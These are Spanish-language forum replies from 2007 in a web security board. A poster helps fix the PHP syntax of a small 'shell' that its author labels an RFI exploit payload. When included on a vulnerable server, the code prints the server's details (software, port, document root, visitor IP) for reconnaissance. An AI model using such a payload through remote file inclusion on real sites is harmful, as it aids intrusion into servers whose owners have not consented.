|
174
|
Seguridad Informática / Nivel Web / Re: Problema programacion de shell RFI
|
en: 11 Julio 2007, 00:07 am
|
PHP es case sensitive es decir, no es lo mismo $a que $A, partiendo de eso, $_server['SERVER_NAME'] no es lo mismo que $_SERVER['SERVER_NAME'], ya que SERVER debe de estar escrito en mayúsculas.
También he de decir a Ertai que es lo mismo $_SERVER['SERVER_NAME'] que $SERVER_NAME...
skapunky, el último código que escribí funciona correctamente, no se porque no lo utilizas.
¿Como saber si el código funciona correctamente? Sube el código a cualquier servidor con soporte PHP y si te carga todo correctamente también lo hará cuando hagas el include().
|
|
|
176
|
Seguridad Informática / Nivel Web / Re: Problema programacion de shell RFI
|
en: 10 Julio 2007, 18:59 pm
|
Deberías de leerte algún manual de PHP, no tienes mucha soltura con éste... <?php echo "<b>Server Software: </b>".$SERVER_SOFTWARE. "<br><b>Server Name: </b>".$SERVER_NAME. "<br><b>Server Protocol: </b>".$SERVER_PROTOCOL. "<br><b>Server Port: </b>".$SERVER_PORT. "<br><b>CGI usada por el servidor: </b>".$GATEWAY_INTERFACE. "<br><b>Directorio Root: </b>".$DOCUMENT_ROOT. "<br><b>Tipo de conexión: </b>".$HTTP_CONNECTION. "<br><b>Dirección IP Remitente: </b>".$REMOTE_ADDR; ?>
|
|
|
177
|
Seguridad Informática / Nivel Web / Re: Problema programacion de shell RFI
|
en: 10 Julio 2007, 17:55 pm
|
Dentro de las etiquetas <?php y ?> solo puede haber código en PHP, si quieres escribir en HTML deberás hacerlo mediante echo... <?php
//***************************************************************************************** //* PHP shell writted by skapunky , 2007 :: Exploit RFI :: * //***************************************************************************************** //* __$$$$$$____________________________$$$$$________ * //* __$$$$$$$$*_____________________,,$$$$$$$$*___ * //* ___$$$$$$$$$$,,_______________,,$$$$$$$$$$*__ * //* ____$$$$$$$$$$$$__ ._____.___$$$$$$$$$$$$________ * //* ____$$$$$$$$$$$$$,_'.____.'_,,$$$$$$$$$$$$$____ * //* ____$$$$$$$$$$$$$$,, '.__,'_$$$$$$$$$$$$$$$____ * //* ____$$$$$$$$$$$$$$$$.@:,$$$$$$$$$$$$$$$$__ * //* ______***$$$$$$$$$$$@@$$$$$$$$$$$****_____ * //* __________,,,__*$$$$$$@.$$$$$$,,,,,,_______ * //* _____,,$$$$$$$$$$$$$* @ *$$$$$$$$$$$$,,,___ * //* ____*$$$$$$$$$$$$$*_@@_*$$$$$$$$$$$$$___ * //* ___,,*$$$$$$$$$$$$$__.@.__*$$$$$$$$$$$$$..____ * //* ______*$$$$$$$$$$$___*___*$$$$$$$$$$$$$$$,___ * //* ____,,*$$$$$$$$$$_________$$$$$$$$$$$$$___ * //* ____,$$$$$$$$$**'______$$$$$$$$$$$'***____ * //* ____,,$$$$'_.*_______$$$$$$$$$__*____** _ * //* * //* License Freeware, x69.txt * //***************************************************************************************** ?> <html> <body>
<b>Server Software:</b> <? echo $SERVER_SOFTWARE ?> <br> <b>Server Name:</b> <? echo $SERVER_NAME ?> <br> <b>Server Protocol:</b> <? echo $SERVER_PROTOCOL ?> <br> <b>Server Port:</b> <? echo $SERVER_PORT ?> <br> <b>CGI usada por el servidor :</b> <? echo $GATEWAY_INTERFACE ?> <br> <b>Directorio Root:</b> <? echo $DOCUMENT_ROOT ?> <br> <b>Tipo de conexión:</b> <? echo $HTTP_CONNECTION ?> <br> <b>Dirección IP Remitente:</b> <? echo $REMOTE_ADDR ?> <br>
</body> </html>
|
|
|
|
|
|
|